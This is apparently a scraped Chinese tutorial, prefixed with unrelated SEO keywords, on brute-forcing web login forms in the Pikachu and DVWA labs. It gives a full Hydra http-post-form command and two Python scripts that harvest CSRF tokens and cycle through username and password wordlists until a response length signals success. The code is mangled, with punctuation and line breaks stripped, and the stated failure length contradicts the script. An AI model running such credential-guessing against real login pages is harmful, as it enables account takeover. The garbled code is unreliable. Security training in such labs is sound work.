学畅留学招聘网站开发主管,弥勒市建设局网站,个人怎么注册网站,南通网络公司网站文章目录 无token时的Hydra post登录框爆破带Token时的Hydra post登录框爆破 无token时的Hydra post登录框爆破
登录一个无验证码和token的页面#xff0c;同时抓包拦截
取出发送数据包#xff1a;usernameadbpassword133submitLogin 将用户名和密码替换 userna… 文章目录 无token时的Hydra post登录框爆破带Token时的Hydra post登录框爆破 无token时的Hydra post登录框爆破
登录一个无验证码和token的页面同时抓包拦截
取出发送数据包usernameadbpassword133submitLogin 将用户名和密码替换 usernameUSERpasswordPASSsubmitLogin 同时获取路径/pikachu/vul/burteforce/bf_form.php 拼接发送数据后就是 /pikachu/vul/burteforce/bf_form.php:usernameUSERpasswordPASSsubmitLogin 获取目标Ip192.168.180.2 获取登录失败时的错误提示username or password is not exists
启动hydra开始爆破 hydra -L /home/kali/dic/acount.txt -P /home/kali/dic/mima.txt -V -f 192.168.180.2 http-post-form “/pikachu/vul/burteforce/bf_form.php:usernameUSERpasswordPASSsubmitLogin:username or password is not exists” -f表示找到一个马上停止
带Token时的Hydra post登录框爆破
首先准备一个带token的登录页面
抓包可以看到存在token
提取其中的POST路径/dvwa/login.php 提取ip:192.168.180.2
然后准备一个python脚本将路径和ip替换到相应位置,如下所示
# -*- coding: utf-8 -*-
import urllib
import requests
from bs4 import BeautifulSoup
##第一步先访问 http://127.0.0.1/login.php页面获得服务器返回的cookie和token
def get_cookie_token(ip, url):headers{Host:ip,User-Agent:Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0,Accept:text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8,Accept-Lanuage:zh-CN,zh;q0.8,en-US;q0.5,en;q0.3,Connection:keep-alive,Upgrade-Insecure-Requests:1}resrequests.get(url,headersheaders)cookiesres.cookiesa[(;.join([.join(item)for item in cookies.items()]))] ## a为列表存储cookie和tokenhtmlres.textsoupBeautifulSoup(html,html.parser)tokensoup.form.contents[3][value]a.append(token)return a##第二步模拟登陆
#ip 192.168.180.2
#url http://192.168.180.2/dvwa/login.php
def Login(a,username,password, ip, url): #a是包含了cookie和token的列表headers{Host:ip,User-Agent:Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0,Accept:text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8,Accept-Lanuage:zh-CN,zh;q0.8,en-US;q0.5,en;q0.3,Connection:keep-alive,Content-Length:88,Content-Type:application/x-www-form-urlencoded,Upgrade-Insecure-Requests:1,Cookie:a[0],Referer:url}values{username:username,password:password,Login:Login,user_token:a[1]}dataurllib.parse.urlencode(values)resprequests.post(url,datadata,headersheaders)return
#重定向到index.php
def getacount(ip, url):with open(acount.txt,r) as f:usersf.readlines()stop Falsefor user in users:if stop True:breakuseruser.strip(\n) #用户名with open(mima.txt,r) as file:passwdsfile.readlines()for passwd in passwds:passwdpasswd.strip(\n) #密码aget_cookie_token(ip, url) ##a列表中存储了服务器返回的cookie和tokeLogin(a,user,passwd, ip, url)headers{Host:ip,User-Agent:Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0,Accept:text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8,Accept-Lanuage:zh-CN,zh;q0.8,en-US;q0.5,en;q0.3,Connection:keep-alive,Upgrade-Insecure-Requests:1,Cookie:a[0],Referer:url}responserequests.get(url,headersheaders)#print(len(response.text))content_size len(response.text)if content_size ! 1562: #如果登录成功print(用户名为%s ,密码为%s%(user,passwd)) #打印出用户名和密码stop Truebreak
def main():ip 192.168.180.2url http://192.168.180.2/dvwa/login.phpgetacount(ip, url)
if __name____main__:main()然后开启print(len(response.text))获取错误登录时的长度
可以看到错误时都是1523将该值替换到 if content_size ! 1523: #如果登录成功 同时注释print(len(response.text)) 可以看到顺利爆破出了用户名密码 方法三(通用)、
from bs4 import BeautifulSoup
import requests
from requests.models import Response#url http://127.0.0.1:98/vul/burteforce/bf_token.php
url http://127.0.0.1:81/login.php
user_token 8680761fe979039a6f836599906
#proxies {http: http://127.0.0.1:8080} # 代理设置方便burp抓包查看和调试
header {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0,Cookie: PHPSESSID17u0i2fakm84eq9oc24boc8715
}def get_token(r):soup BeautifulSoup(r.text, html.parser)#选择表单项的token#user_token soup.select(input[nametoken])[0][value]user_token soup.select(input[nameuser_token])[0][value]return user_tokenif __name__ __main__:f open(result.csv, w) #把爆破结果储存到文件里这里为csv格式f.write(用户名 , 密码 , 包长度 \n) #给文件设置标题stop False#遍历字典文件Cluster bomb 暴力破解for admin in open(acount.txt):if stop True:breakfor line in open(mima.txt):username admin.strip()password line.strip()payload { #payload为POST的数据#需有表单数据所有项目如usernameadbpasswordadfdLoginLoginuser_token637b782363ffc7a618aea9a932c377ceusername: username,password: password,#token: user_token,user_token: user_token,#submit: LoginLogin: Login}Response requests.post(url, datapayload, headersheader)result username , password , str(len(Response.text)) #用户名密码以及响应包长度print(len(Response.text))content_size len(Response.text)#if content_size ! 34090 and content_size ! 34071: #如果登录成功if content_size ! 1562 and content_size ! 1573: #如果登录成功print(用户名为%s ,密码为%s%(username,password)) #打印出用户名和密码#print(result) #输出到终端stop Truebreakf.write(result \n) #输出到文件user_token get_token(Response) #调用get_token函数获取下一次循环需要的tokenprint(\n---完成---\n)f.close()
